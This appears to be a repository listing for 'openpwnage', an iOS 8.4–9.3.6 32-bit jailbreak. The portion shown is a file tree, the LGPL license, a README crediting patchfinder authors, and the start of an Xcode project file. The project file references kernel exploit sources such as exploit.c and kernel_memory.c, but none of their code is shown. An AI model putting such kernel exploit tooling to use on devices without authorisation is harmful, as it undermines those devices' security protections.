├── LICENSE
├── README.md
├── openpwnage.xcodeproj
    ├── project.pbxproj
    ├── project.xcworkspace
    │   ├── contents.xcworkspacedata
    │   ├── xcshareddata
    │   │   ├── IDEWorkspaceChecks.plist
    │   │   └── WorkspaceSettings.xcsettings
    │   └── xcuserdata
    │   │   └── zachary7829.xcuserdatad
    │   │       ├── UserInterfaceState.xcuserstate
    │   │       └── WorkspaceSettings.xcsettings
    ├── xcshareddata
    │   └── xcschemes
    │   │   └── openpwnage.xcscheme
    └── xcuserdata
    │   └── zachary7829.xcuserdatad
    │       ├── xcdebugger
    │           └── Breakpoints_v2.xcbkptlist
    │       └── xcschemes
    │           └── xcschememanagement.plist
├── openpwnage
    ├── AppDelegate.h
    ├── AppDelegate.m
    ├── Assets.xcassets
    │   ├── AccentColor.colorset
    │   │   └── Contents.json
    │   ├── AppIcon.appiconset
    │   │   ├── Contents.json
    │   │   ├── openpwnagebeta7 (1)-1.png
    │   │   ├── openpwnagebeta7 (1).png
    │   │   ├── openpwnagebeta7 (10).png
    │   │   ├── openpwnagebeta7 (11).png
    │   │   ├── openpwnagebeta7 (2).png
    │   │   ├── openpwnagebeta7 (3)-1.png
    │   │   ├── openpwnagebeta7 (3).png
    │   │   ├── openpwnagebeta7 (4).png
    │   │   ├── openpwnagebeta7 (5).png
    │   │   ├── openpwnagebeta7 (6)-1.png
    │   │   ├── openpwnagebeta7 (6)-2.png
    │   │   ├── openpwnagebeta7 (6).png
    │   │   ├── openpwnagebeta7 (7).png
    │   │   ├── openpwnagebeta7 (8)-1.png
    │   │   ├── openpwnagebeta7 (8).png
    │   │   └── openpwnagebeta7 (9).png
    │   ├── Contents.json
    │   ├── openpwnageB7JailbreakButtonopenpwnageB7JailbreakButton.imageset
    │   │   ├── Contents.json
    │   │   └── openpwnageB7JailbreakButtonopenpwnageB7JailbreakButton (3).png
    │   └── openpwnageB7JailbreakingButtonopenpwnageB7JailbreakingButton.imageset
    │   │   ├── Contents.json
    │   │   └── openpwnageB7JailbreakButtonopenpwnageB7JailbreakButton (4).png
    ├── Base.lproj
    │   ├── LaunchScreen.storyboard
    │   └── Main.storyboard
    ├── Info.plist
    ├── LGPL
    │   ├── LICENSE
    │   ├── kpmapAndCo.h
    │   ├── kpmapAndCo.m
    │   ├── patchfinder.h
    │   └── patchfinder.m
    ├── SettingsViewController.h
    ├── SettingsViewController.m
    ├── ViewController.h
    ├── ViewController.m
    ├── bootstrap.tar
    ├── jailbreak.h
    ├── jailbreak.m
    ├── launchctl
    ├── main.m
    ├── openpwnage
    │   ├── patchfinder8.c
    │   ├── patchfinder8.h
    │   ├── phoenix.m
    │   ├── trident.h
    │   └── trident.m
    └── tar
└── releases
    └── openpwnage-build9-fix.ipa


/LICENSE:
--------------------------------------------------------------------------------
  1 |                   GNU LESSER GENERAL PUBLIC LICENSE
  2 |                        Version 2.1, February 1999
  3 | 
  4 |  Copyright (C) 1991, 1999 Free Software Foundation, Inc.
  5 |  51 Franklin Street, Fifth Floor, Boston, MA  02110-1301  USA
  6 |  Everyone is permitted to copy and distribute verbatim copies
  7 |  of this license document, but changing it is not allowed.
  8 | 
  9 | [This is the first released version of the Lesser GPL.  It also counts
 10 |  as the successor of the GNU Library Public License, version 2, hence
 11 |  the version number 2.1.]
 12 | 
 13 |                             Preamble
 14 | 
 15 |   The licenses for most software are designed to take away your
 16 | freedom to share and change it.  By contrast, the GNU General Public
 17 | Licenses are intended to guarantee your freedom to share and change
 18 | free software--to make sure the software is free for all its users.
 19 | 
 20 |   This license, the Lesser General Public License, applies to some
 21 | specially designated software packages--typically libraries--of the
 22 | Free Software Foundation and other authors who decide to use it.  You
 23 | can use it too, but we suggest you first think carefully about whether
 24 | this license or the ordinary General Public License is the better
 25 | strategy to use in any particular case, based on the explanations below.
 26 | 
 27 |   When we speak of free software, we are referring to freedom of use,
 28 | not price.  Our General Public Licenses are designed to make sure that
 29 | you have the freedom to distribute copies of free software (and charge
 30 | for this service if you wish); that you receive source code or can get
 31 | it if you want it; that you can change the software and use pieces of
 32 | it in new free programs; and that you are informed that you can do
 33 | these things.
 34 | 
 35 |   To protect your rights, we need to make restrictions that forbid
 36 | distributors to deny you these rights or to ask you to surrender these
 37 | rights.  These restrictions translate to certain responsibilities for
 38 | you if you distribute copies of the library or if you modify it.
 39 | 
 40 |   For example, if you distribute copies of the library, whether gratis
 41 | or for a fee, you must give the recipients all the rights that we gave
 42 | you.  You must make sure that they, too, receive or can get the source
 43 | code.  If you link other code with the library, you must provide
 44 | complete object files to the recipients, so that they can relink them
 45 | with the library after making changes to the library and recompiling
 46 | it.  And you must show them these terms so they know their rights.
 47 | 
 48 |   We protect your rights with a two-step method: (1) we copyright the
 49 | library, and (2) we offer you this license, which gives you legal
 50 | permission to copy, distribute and/or modify the library.
 51 | 
 52 |   To protect each distributor, we want to make it very clear that
 53 | there is no warranty for the free library.  Also, if the library is
 54 | modified by someone else and passed on, the recipients should know
 55 | that what they have is not the original version, so that the original
 56 | author's reputation will not be affected by problems that might be
 57 | introduced by others.
 58 | 
 59 |   Finally, software patents pose a constant threat to the existence of
 60 | any free program.  We wish to make sure that a company cannot
 61 | effectively restrict the users of a free program by obtaining a
 62 | restrictive license from a patent holder.  Therefore, we insist that
 63 | any patent license obtained for a version of the library must be
 64 | consistent with the full freedom of use specified in this license.
 65 | 
 66 |   Most GNU software, including some libraries, is covered by the
 67 | ordinary GNU General Public License.  This license, the GNU Lesser
 68 | General Public License, applies to certain designated libraries, and
 69 | is quite different from the ordinary General Public License.  We use
 70 | this license for certain libraries in order to permit linking those
 71 | libraries into non-free programs.
 72 | 
 73 |   When a program is linked with a library, whether statically or using
 74 | a shared library, the combination of the two is legally speaking a
 75 | combined work, a derivative of the original library.  The ordinary
 76 | General Public License therefore permits such linking only if the
 77 | entire combination fits its criteria of freedom.  The Lesser General
 78 | Public License permits more lax criteria for linking other code with
 79 | the library.
 80 | 
 81 |   We call this license the "Lesser" General Public License because it
 82 | does Less to protect the user's freedom than the ordinary General
 83 | Public License.  It also provides other free software developers Less
 84 | of an advantage over competing non-free programs.  These disadvantages
 85 | are the reason we use the ordinary General Public License for many
 86 | libraries.  However, the Lesser license provides advantages in certain
 87 | special circumstances.
 88 | 
 89 |   For example, on rare occasions, there may be a special need to
 90 | encourage the widest possible use of a certain library, so that it becomes
 91 | a de-facto standard.  To achieve this, non-free programs must be
 92 | allowed to use the library.  A more frequent case is that a free
 93 | library does the same job as widely used non-free libraries.  In this
 94 | case, there is little to gain by limiting the free library to free
 95 | software only, so we use the Lesser General Public License.
 96 | 
 97 |   In other cases, permission to use a particular library in non-free
 98 | programs enables a greater number of people to use a large body of
 99 | free software.  For example, permission to use the GNU C Library in
100 | non-free programs enables many more people to use the whole GNU
101 | operating system, as well as its variant, the GNU/Linux operating
102 | system.
103 | 
104 |   Although the Lesser General Public License is Less protective of the
105 | users' freedom, it does ensure that the user of a program that is
106 | linked with the Library has the freedom and the wherewithal to run
107 | that program using a modified version of the Library.
108 | 
109 |   The precise terms and conditions for copying, distribution and
110 | modification follow.  Pay close attention to the difference between a
111 | "work based on the library" and a "work that uses the library".  The
112 | former contains code derived from the library, whereas the latter must
113 | be combined with the library in order to run.
114 | 
115 |                   GNU LESSER GENERAL PUBLIC LICENSE
116 |    TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION
117 | 
118 |   0. This License Agreement applies to any software library or other
119 | program which contains a notice placed by the copyright holder or
120 | other authorized party saying it may be distributed under the terms of
121 | this Lesser General Public License (also called "this License").
122 | Each licensee is addressed as "you".
123 | 
124 |   A "library" means a collection of software functions and/or data
125 | prepared so as to be conveniently linked with application programs
126 | (which use some of those functions and data) to form executables.
127 | 
128 |   The "Library", below, refers to any such software library or work
129 | which has been distributed under these terms.  A "work based on the
130 | Library" means either the Library or any derivative work under
131 | copyright law: that is to say, a work containing the Library or a
132 | portion of it, either verbatim or with modifications and/or translated
133 | straightforwardly into another language.  (Hereinafter, translation is
134 | included without limitation in the term "modification".)
135 | 
136 |   "Source code" for a work means the preferred form of the work for
137 | making modifications to it.  For a library, complete source code means
138 | all the source code for all modules it contains, plus any associated
139 | interface definition files, plus the scripts used to control compilation
140 | and installation of the library.
141 | 
142 |   Activities other than copying, distribution and modification are not
143 | covered by this License; they are outside its scope.  The act of
144 | running a program using the Library is not restricted, and output from
145 | such a program is covered only if its contents constitute a work based
146 | on the Library (independent of the use of the Library in a tool for
147 | writing it).  Whether that is true depends on what the Library does
148 | and what the program that uses the Library does.
149 | 
150 |   1. You may copy and distribute verbatim copies of the Library's
151 | complete source code as you receive it, in any medium, provided that
152 | you conspicuously and appropriately publish on each copy an
153 | appropriate copyright notice and disclaimer of warranty; keep intact
154 | all the notices that refer to this License and to the absence of any
155 | warranty; and distribute a copy of this License along with the
156 | Library.
157 | 
158 |   You may charge a fee for the physical act of transferring a copy,
159 | and you may at your option offer warranty protection in exchange for a
160 | fee.
161 | 
162 |   2. You may modify your copy or copies of the Library or any portion
163 | of it, thus forming a work based on the Library, and copy and
164 | distribute such modifications or work under the terms of Section 1
165 | above, provided that you also meet all of these conditions:
166 | 
167 |     a) The modified work must itself be a software library.
168 | 
169 |     b) You must cause the files modified to carry prominent notices
170 |     stating that you changed the files and the date of any change.
171 | 
172 |     c) You must cause the whole of the work to be licensed at no
173 |     charge to all third parties under the terms of this License.
174 | 
175 |     d) If a facility in the modified Library refers to a function or a
176 |     table of data to be supplied by an application program that uses
177 |     the facility, other than as an argument passed when the facility
178 |     is invoked, then you must make a good faith effort to ensure that,
179 |     in the event an application does not supply such function or
180 |     table, the facility still operates, and performs whatever part of
181 |     its purpose remains meaningful.
182 | 
183 |     (For example, a function in a library to compute square roots has
184 |     a purpose that is entirely well-defined independent of the
185 |     application.  Therefore, Subsection 2d requires that any
186 |     application-supplied function or table used by this function must
187 |     be optional: if the application does not supply it, the square
188 |     root function must still compute square roots.)
189 | 
190 | These requirements apply to the modified work as a whole.  If
191 | identifiable sections of that work are not derived from the Library,
192 | and can be reasonably considered independent and separate works in
193 | themselves, then this License, and its terms, do not apply to those
194 | sections when you distribute them as separate works.  But when you
195 | distribute the same sections as part of a whole which is a work based
196 | on the Library, the distribution of the whole must be on the terms of
197 | this License, whose permissions for other licensees extend to the
198 | entire whole, and thus to each and every part regardless of who wrote
199 | it.
200 | 
201 | Thus, it is not the intent of this section to claim rights or contest
202 | your rights to work written entirely by you; rather, the intent is to
203 | exercise the right to control the distribution of derivative or
204 | collective works based on the Library.
205 | 
206 | In addition, mere aggregation of another work not based on the Library
207 | with the Library (or with a work based on the Library) on a volume of
208 | a storage or distribution medium does not bring the other work under
209 | the scope of this License.
210 | 
211 |   3. You may opt to apply the terms of the ordinary GNU General Public
212 | License instead of this License to a given copy of the Library.  To do
213 | this, you must alter all the notices that refer to this License, so
214 | that they refer to the ordinary GNU General Public License, version 2,
215 | instead of to this License.  (If a newer version than version 2 of the
216 | ordinary GNU General Public License has appeared, then you can specify
217 | that version instead if you wish.)  Do not make any other change in
218 | these notices.
219 | 
220 |   Once this change is made in a given copy, it is irreversible for
221 | that copy, so the ordinary GNU General Public License applies to all
222 | subsequent copies and derivative works made from that copy.
223 | 
224 |   This option is useful when you wish to copy part of the code of
225 | the Library into a program that is not a library.
226 | 
227 |   4. You may copy and distribute the Library (or a portion or
228 | derivative of it, under Section 2) in object code or executable form
229 | under the terms of Sections 1 and 2 above provided that you accompany
230 | it with the complete corresponding machine-readable source code, which
231 | must be distributed under the terms of Sections 1 and 2 above on a
232 | medium customarily used for software interchange.
233 | 
234 |   If distribution of object code is made by offering access to copy
235 | from a designated place, then offering equivalent access to copy the
236 | source code from the same place satisfies the requirement to
237 | distribute the source code, even though third parties are not
238 | compelled to copy the source along with the object code.
239 | 
240 |   5. A program that contains no derivative of any portion of the
241 | Library, but is designed to work with the Library by being compiled or
242 | linked with it, is called a "work that uses the Library".  Such a
243 | work, in isolation, is not a derivative work of the Library, and
244 | therefore falls outside the scope of this License.
245 | 
246 |   However, linking a "work that uses the Library" with the Library
247 | creates an executable that is a derivative of the Library (because it
248 | contains portions of the Library), rather than a "work that uses the
249 | library".  The executable is therefore covered by this License.
250 | Section 6 states terms for distribution of such executables.
251 | 
252 |   When a "work that uses the Library" uses material from a header file
253 | that is part of the Library, the object code for the work may be a
254 | derivative work of the Library even though the source code is not.
255 | Whether this is true is especially significant if the work can be
256 | linked without the Library, or if the work is itself a library.  The
257 | threshold for this to be true is not precisely defined by law.
258 | 
259 |   If such an object file uses only numerical parameters, data
260 | structure layouts and accessors, and small macros and small inline
261 | functions (ten lines or less in length), then the use of the object
262 | file is unrestricted, regardless of whether it is legally a derivative
263 | work.  (Executables containing this object code plus portions of the
264 | Library will still fall under Section 6.)
265 | 
266 |   Otherwise, if the work is a derivative of the Library, you may
267 | distribute the object code for the work under the terms of Section 6.
268 | Any executables containing that work also fall under Section 6,
269 | whether or not they are linked directly with the Library itself.
270 | 
271 |   6. As an exception to the Sections above, you may also combine or
272 | link a "work that uses the Library" with the Library to produce a
273 | work containing portions of the Library, and distribute that work
274 | under terms of your choice, provided that the terms permit
275 | modification of the work for the customer's own use and reverse
276 | engineering for debugging such modifications.
277 | 
278 |   You must give prominent notice with each copy of the work that the
279 | Library is used in it and that the Library and its use are covered by
280 | this License.  You must supply a copy of this License.  If the work
281 | during execution displays copyright notices, you must include the
282 | copyright notice for the Library among them, as well as a reference
283 | directing the user to the copy of this License.  Also, you must do one
284 | of these things:
285 | 
286 |     a) Accompany the work with the complete corresponding
287 |     machine-readable source code for the Library including whatever
288 |     changes were used in the work (which must be distributed under
289 |     Sections 1 and 2 above); and, if the work is an executable linked
290 |     with the Library, with the complete machine-readable "work that
291 |     uses the Library", as object code and/or source code, so that the
292 |     user can modify the Library and then relink to produce a modified
293 |     executable containing the modified Library.  (It is understood
294 |     that the user who changes the contents of definitions files in the
295 |     Library will not necessarily be able to recompile the application
296 |     to use the modified definitions.)
297 | 
298 |     b) Use a suitable shared library mechanism for linking with the
299 |     Library.  A suitable mechanism is one that (1) uses at run time a
300 |     copy of the library already present on the user's computer system,
301 |     rather than copying library functions into the executable, and (2)
302 |     will operate properly with a modified version of the library, if
303 |     the user installs one, as long as the modified version is
304 |     interface-compatible with the version that the work was made with.
305 | 
306 |     c) Accompany the work with a written offer, valid for at
307 |     least three years, to give the same user the materials
308 |     specified in Subsection 6a, above, for a charge no more
309 |     than the cost of performing this distribution.
310 | 
311 |     d) If distribution of the work is made by offering access to copy
312 |     from a designated place, offer equivalent access to copy the above
313 |     specified materials from the same place.
314 | 
315 |     e) Verify that the user has already received a copy of these
316 |     materials or that you have already sent this user a copy.
317 | 
318 |   For an executable, the required form of the "work that uses the
319 | Library" must include any data and utility programs needed for
320 | reproducing the executable from it.  However, as a special exception,
321 | the materials to be distributed need not include anything that is
322 | normally distributed (in either source or binary form) with the major
323 | components (compiler, kernel, and so on) of the operating system on
324 | which the executable runs, unless that component itself accompanies
325 | the executable.
326 | 
327 |   It may happen that this requirement contradicts the license
328 | restrictions of other proprietary libraries that do not normally
329 | accompany the operating system.  Such a contradiction means you cannot
330 | use both them and the Library together in an executable that you
331 | distribute.
332 | 
333 |   7. You may place library facilities that are a work based on the
334 | Library side-by-side in a single library together with other library
335 | facilities not covered by this License, and distribute such a combined
336 | library, provided that the separate distribution of the work based on
337 | the Library and of the other library facilities is otherwise
338 | permitted, and provided that you do these two things:
339 | 
340 |     a) Accompany the combined library with a copy of the same work
341 |     based on the Library, uncombined with any other library
342 |     facilities.  This must be distributed under the terms of the
343 |     Sections above.
344 | 
345 |     b) Give prominent notice with the combined library of the fact
346 |     that part of it is a work based on the Library, and explaining
347 |     where to find the accompanying uncombined form of the same work.
348 | 
349 |   8. You may not copy, modify, sublicense, link with, or distribute
350 | the Library except as expressly provided under this License.  Any
351 | attempt otherwise to copy, modify, sublicense, link with, or
352 | distribute the Library is void, and will automatically terminate your
353 | rights under this License.  However, parties who have received copies,
354 | or rights, from you under this License will not have their licenses
355 | terminated so long as such parties remain in full compliance.
356 | 
357 |   9. You are not required to accept this License, since you have not
358 | signed it.  However, nothing else grants you permission to modify or
359 | distribute the Library or its derivative works.  These actions are
360 | prohibited by law if you do not accept this License.  Therefore, by
361 | modifying or distributing the Library (or any work based on the
362 | Library), you indicate your acceptance of this License to do so, and
363 | all its terms and conditions for copying, distributing or modifying
364 | the Library or works based on it.
365 | 
366 |   10. Each time you redistribute the Library (or any work based on the
367 | Library), the recipient automatically receives a license from the
368 | original licensor to copy, distribute, link with or modify the Library
369 | subject to these terms and conditions.  You may not impose any further
370 | restrictions on the recipients' exercise of the rights granted herein.
371 | You are not responsible for enforcing compliance by third parties with
372 | this License.
373 | 
374 |   11. If, as a consequence of a court judgment or allegation of patent
375 | infringement or for any other reason (not limited to patent issues),
376 | conditions are imposed on you (whether by court order, agreement or
377 | otherwise) that contradict the conditions of this License, they do not
378 | excuse you from the conditions of this License.  If you cannot
379 | distribute so as to satisfy simultaneously your obligations under this
380 | License and any other pertinent obligations, then as a consequence you
381 | may not distribute the Library at all.  For example, if a patent
382 | license would not permit royalty-free redistribution of the Library by
383 | all those who receive copies directly or indirectly through you, then
384 | the only way you could satisfy both it and this License would be to
385 | refrain entirely from distribution of the Library.
386 | 
387 | If any portion of this section is held invalid or unenforceable under any
388 | particular circumstance, the balance of the section is intended to apply,
389 | and the section as a whole is intended to apply in other circumstances.
390 | 
391 | It is not the purpose of this section to induce you to infringe any
392 | patents or other property right claims or to contest validity of any
393 | such claims; this section has the sole purpose of protecting the
394 | integrity of the free software distribution system which is
395 | implemented by public license practices.  Many people have made
396 | generous contributions to the wide range of software distributed
397 | through that system in reliance on consistent application of that
398 | system; it is up to the author/donor to decide if he or she is willing
399 | to distribute software through any other system and a licensee cannot
400 | impose that choice.
401 | 
402 | This section is intended to make thoroughly clear what is believed to
403 | be a consequence of the rest of this License.
404 | 
405 |   12. If the distribution and/or use of the Library is restricted in
406 | certain countries either by patents or by copyrighted interfaces, the
407 | original copyright holder who places the Library under this License may add
408 | an explicit geographical distribution limitation excluding those countries,
409 | so that distribution is permitted only in or among countries not thus
410 | excluded.  In such case, this License incorporates the limitation as if
411 | written in the body of this License.
412 | 
413 |   13. The Free Software Foundation may publish revised and/or new
414 | versions of the Lesser General Public License from time to time.
415 | Such new versions will be similar in spirit to the present version,
416 | but may differ in detail to address new problems or concerns.
417 | 
418 | Each version is given a distinguishing version number.  If the Library
419 | specifies a version number of this License which applies to it and
420 | "any later version", you have the option of following the terms and
421 | conditions either of that version or of any later version published by
422 | the Free Software Foundation.  If the Library does not specify a
423 | license version number, you may choose any version ever published by
424 | the Free Software Foundation.
425 | 
426 |   14. If you wish to incorporate parts of the Library into other free
427 | programs whose distribution conditions are incompatible with these,
428 | write to the author to ask for permission.  For software which is
429 | copyrighted by the Free Software Foundation, write to the Free
430 | Software Foundation; we sometimes make exceptions for this.  Our
431 | decision will be guided by the two goals of preserving the free status
432 | of all derivatives of our free software and of promoting the sharing
433 | and reuse of software generally.
434 | 
435 |                             NO WARRANTY
436 | 
437 |   15. BECAUSE THE LIBRARY IS LICENSED FREE OF CHARGE, THERE IS NO
438 | WARRANTY FOR THE LIBRARY, TO THE EXTENT PERMITTED BY APPLICABLE LAW.
439 | EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR
440 | OTHER PARTIES PROVIDE THE LIBRARY "AS IS" WITHOUT WARRANTY OF ANY
441 | KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE
442 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
443 | PURPOSE.  THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE
444 | LIBRARY IS WITH YOU.  SHOULD THE LIBRARY PROVE DEFECTIVE, YOU ASSUME
445 | THE COST OF ALL NECESSARY SERVICING, REPAIR OR CORRECTION.
446 | 
447 |   16. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN
448 | WRITING WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY
449 | AND/OR REDISTRIBUTE THE LIBRARY AS PERMITTED ABOVE, BE LIABLE TO YOU
450 | FOR DAMAGES, INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR
451 | CONSEQUENTIAL DAMAGES ARISING OUT OF THE USE OR INABILITY TO USE THE
452 | LIBRARY (INCLUDING BUT NOT LIMITED TO LOSS OF DATA OR DATA BEING
453 | RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD PARTIES OR A
454 | FAILURE OF THE LIBRARY TO OPERATE WITH ANY OTHER SOFTWARE), EVEN IF
455 | SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH
456 | DAMAGES.
457 | 
458 |                      END OF TERMS AND CONDITIONS
459 | 
460 |            How to Apply These Terms to Your New Libraries
461 | 
462 |   If you develop a new library, and you want it to be of the greatest
463 | possible use to the public, we recommend making it free software that
464 | everyone can redistribute and change.  You can do so by permitting
465 | redistribution under these terms (or, alternatively, under the terms of the
466 | ordinary General Public License).
467 | 
468 |   To apply these terms, attach the following notices to the library.  It is
469 | safest to attach them to the start of each source file to most effectively
470 | convey the exclusion of warranty; and each file should have at least the
471 | "copyright" line and a pointer to where the full notice is found.
472 | 
473 |     <one line to give the library's name and a brief idea of what it does.>
474 |     Copyright (C) <year>  <name of author>
475 | 
476 |     This library is free software; you can redistribute it and/or
477 |     modify it under the terms of the GNU Lesser General Public
478 |     License as published by the Free Software Foundation; either
479 |     version 2.1 of the License, or (at your option) any later version.
480 | 
481 |     This library is distributed in the hope that it will be useful,
482 |     but WITHOUT ANY WARRANTY; without even the implied warranty of
483 |     MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
484 |     Lesser General Public License for more details.
485 | 
486 |     You should have received a copy of the GNU Lesser General Public
487 |     License along with this library; if not, write to the Free Software
488 |     Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301
489 |     USA
490 | 
491 | Also add information on how to contact you by electronic and paper mail.
492 | 
493 | You should also get your employer (if you work as a programmer) or your
494 | school, if any, to sign a "copyright disclaimer" for the library, if
495 | necessary.  Here is a sample; alter the names:
496 | 
497 |   Yoyodyne, Inc., hereby disclaims all copyright interest in the
498 |   library `Frob' (a library for tweaking knobs) written by James Random
499 |   Hacker.
500 | 
501 |   <signature of Ty Coon>, 1 April 1990
502 |   Ty Coon, President of Vice
503 | 
504 | That's all there is to it!
505 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | ## Credits:
 2 | 
 3 | - jailbreak made by 0xilis
 4 | - (jk?) kpmap patch
 5 | - spv/p0laris for patchfinder (based off of planetbeing pf)
 6 | - dora2-ios for part of patchfinder (based off of planetbeing pf)
 7 | 
 8 | # openpwnage
 9 | Open source iOS 8.4b4-9.3.6 32bit Semi-Untethered jailbreak
10 | 
11 | ## Notice
12 | 
13 | iOS 9 patchfinder is by spv, iOS 8 patchfinder (not on this repo) by dora2-iOS. These patchfinders are based off of planetbeing's patchfinder. Please give thanks to them.
14 | 
15 | This shit was a cobbled together and is mostly other people's work and done way worse, please don't use this. I'd honestly recommend using Phoenix instead, it's better coded.
16 | 
17 | 
18 | ## Supported Devices:
19 | 
20 | - iPhone 4S
21 | - iPhone 5
22 | - iPhone 5C
23 | - iPad 2
24 | - iPad 3
25 | - iPad 4
26 | - iPad Mini
27 | - iPod Touch 5
28 | 
29 | ## Supported Firmwares:
30 | 
31 | - iOS 9.3.6
32 | - iOS 9.3.5
33 | - iOS 9.3.4
34 | - iOS 9.3.3
35 | - iOS 9.3.3 Beta 5
36 | - iOS 9.3.3 Beta 4
37 | - iOS 9.3.3 Beta 3
38 | - iOS 9.3.3 Beta 2
39 | - iOS 9.3.3 Beta 1
40 | - iOS 9.3.2
41 | - iOS 9.3.2 Beta 4
42 | - iOS 9.3.2 Beta 3
43 | - iOS 9.3.2 Beta 2
44 | - iOS 9.3.2 Beta 1
45 | - iOS 9.3.1
46 | - iOS 9.3
47 | - iOS 9.3 Beta 7
48 | - iOS 9.3 Beta 6
49 | - iOS 9.3 Beta 5
50 | - iOS 9.3 Beta 4
51 | - iOS 9.3 Beta 3
52 | - iOS 9.3 Beta 2
53 | - iOS 9.3 Beta 1.1
54 | - iOS 9.3 Beta 1
55 | - iOS 9.2.1
56 | - iOS 9.2.1 Beta 2
57 | - iOS 9.2.1 Beta 1
58 | - iOS 9.2
59 | - iOS 9.2 Beta 4
60 | - iOS 9.2 Beta 3
61 | - iOS 9.2 Beta 2
62 | - iOS 9.2 Beta 1
63 | - iOS 9.1
64 | - iOS 9.1 Beta 5
65 | - iOS 9.1 Beta 4
66 | - iOS 9.1 Beta 3
67 | - iOS 9.1 Beta 2
68 | - iOS 9.1 Beta 1
69 | - iOS 9.0.2
70 | - iOS 9.0.1
71 | - iOS 9.0
72 | - iOS 9.0 GM
73 | - iOS 9.0 Beta 5
74 | - iOS 9.0 Beta 4
75 | - iOS 9.0 Beta 3
76 | - iOS 9.0 Beta 2
77 | - iOS 9.0 Beta 1
78 | - iOS 8.4.1
79 | - iOS 8.4.1 Beta 2 (Untested)
80 | - iOS 8.4.1 Beta 1 (Untested)
81 | - iOS 8.4
82 | - iOS 8.4 Beta 4 (Untested)
83 | 
84 | # Special Note:
85 | 
86 | - Please back up first before trying openpwnage.
87 | 


--------------------------------------------------------------------------------
/openpwnage.xcodeproj/project.pbxproj:
--------------------------------------------------------------------------------
  1 | // !$*UTF8*$!
  2 | {
  3 | 	archiveVersion = 1;
  4 | 	classes = {
  5 | 	};
  6 | 	objectVersion = 55;
  7 | 	objects = {
  8 | 
  9 | /* Begin PBXBuildFile section */
 10 | 		B005815C284B22E500B0A55F /* kernel_memory.c in Sources */ = {isa = PBXBuildFile; fileRef = B0058157284B22E500B0A55F /* kernel_memory.c */; };
 11 | 		B005815D284B22E500B0A55F /* sp_offsets.m in Sources */ = {isa = PBXBuildFile; fileRef = B0058158284B22E500B0A55F /* sp_offsets.m */; };
 12 | 		B005815E284B22E500B0A55F /* iosurface.c in Sources */ = {isa = PBXBuildFile; fileRef = B0058159284B22E500B0A55F /* iosurface.c */; };
 13 | 		B005815F284B22E500B0A55F /* exploit_utilities.c in Sources */ = {isa = PBXBuildFile; fileRef = B005815A284B22E500B0A55F /* exploit_utilities.c */; };
 14 | 		B0058160284B22E500B0A55F /* exploit.c in Sources */ = {isa = PBXBuildFile; fileRef = B005815B284B22E500B0A55F /* exploit.c */; };
 15 | 		B00EE4E22851269700DA200C /* trident.m in Sources */ = {isa = PBXBuildFile; fileRef = B00EE4E12851269700DA200C /* trident.m */; };
 16 | 		B00EE4EB2851A55900DA200C /* patchfinder8.c in Sources */ = {isa = PBXBuildFile; fileRef = B00EE4EA2851A55900DA200C /* patchfinder8.c */; };
 17 | 		B03D34A5284BFB130052E025 /* tar in Resources */ = {isa = PBXBuildFile; fileRef = B03D34A4284BFB130052E025 /* tar */; };
 18 | 		B0463B882815AF4600F6C07E /* jailbreak.m in Sources */ = {isa = PBXBuildFile; fileRef = B0463B872815AF4500F6C07E /* jailbreak.m */; };
 19 | 		B05E8BB72810C16E00EA3CE0 /* AppDelegate.m in Sources */ = {isa = PBXBuildFile; fileRef = B05E8BB62810C16E00EA3CE0 /* AppDelegate.m */; };
 20 | 		B05E8BBD2810C16E00EA3CE0 /* ViewController.m in Sources */ = {isa = PBXBuildFile; fileRef = B05E8BBC2810C16E00EA3CE0 /* ViewController.m */; };
 21 | 		B05E8BC02810C16E00EA3CE0 /* Main.storyboard in Resources */ = {isa = PBXBuildFile; fileRef = B05E8BBE2810C16E00EA3CE0 /* Main.storyboard */; };
 22 | 		B05E8BC22810C17300EA3CE0 /* Assets.xcassets in Resources */ = {isa = PBXBuildFile; fileRef = B05E8BC12810C17300EA3CE0 /* Assets.xcassets */; };
 23 | 		B05E8BC52810C17300EA3CE0 /* LaunchScreen.storyboard in Resources */ = {isa = PBXBuildFile; fileRef = B05E8BC32810C17300EA3CE0 /* LaunchScreen.storyboard */; };
 24 | 		B05E8BC82810C17300EA3CE0 /* main.m in Sources */ = {isa = PBXBuildFile; fileRef = B05E8BC72810C17300EA3CE0 /* main.m */; };
 25 | 		B06829C5284C124F00C4B92C /* launchctl in Resources */ = {isa = PBXBuildFile; fileRef = B06829C4284C124F00C4B92C /* launchctl */; };
 26 | 		B086939C2812E7A400E9CAAD /* phoenix.m in Sources */ = {isa = PBXBuildFile; fileRef = B086939B2812E7A400E9CAAD /* phoenix.m */; };
 27 | 		B0A59D73288C632300943659 /* pf10.c in Sources */ = {isa = PBXBuildFile; fileRef = B0A59D72288C632300943659 /* pf10.c */; };
 28 | 		B0C29472281F01B100B00F98 /* IOKit.framework in Frameworks */ = {isa = PBXBuildFile; fileRef = B0C29471281F01B100B00F98 /* IOKit.framework */; };
 29 | 		B0D2591528601C0C00BAFA4C /* bootstrap.tar in Resources */ = {isa = PBXBuildFile; fileRef = B0D2591428601C0C00BAFA4C /* bootstrap.tar */; };
 30 | 		B0F470DD2839223B0019CB57 /* patchfinder.c in Sources */ = {isa = PBXBuildFile; fileRef = B0F470DC2839223B0019CB57 /* patchfinder.c */; };
 31 | 		B0F470E228407C7E0019CB57 /* SettingsViewController.m in Sources */ = {isa = PBXBuildFile; fileRef = B0F470E128407C7E0019CB57 /* SettingsViewController.m */; };
 32 | /* End PBXBuildFile section */
 33 | 
 34 | /* Begin PBXFileReference section */
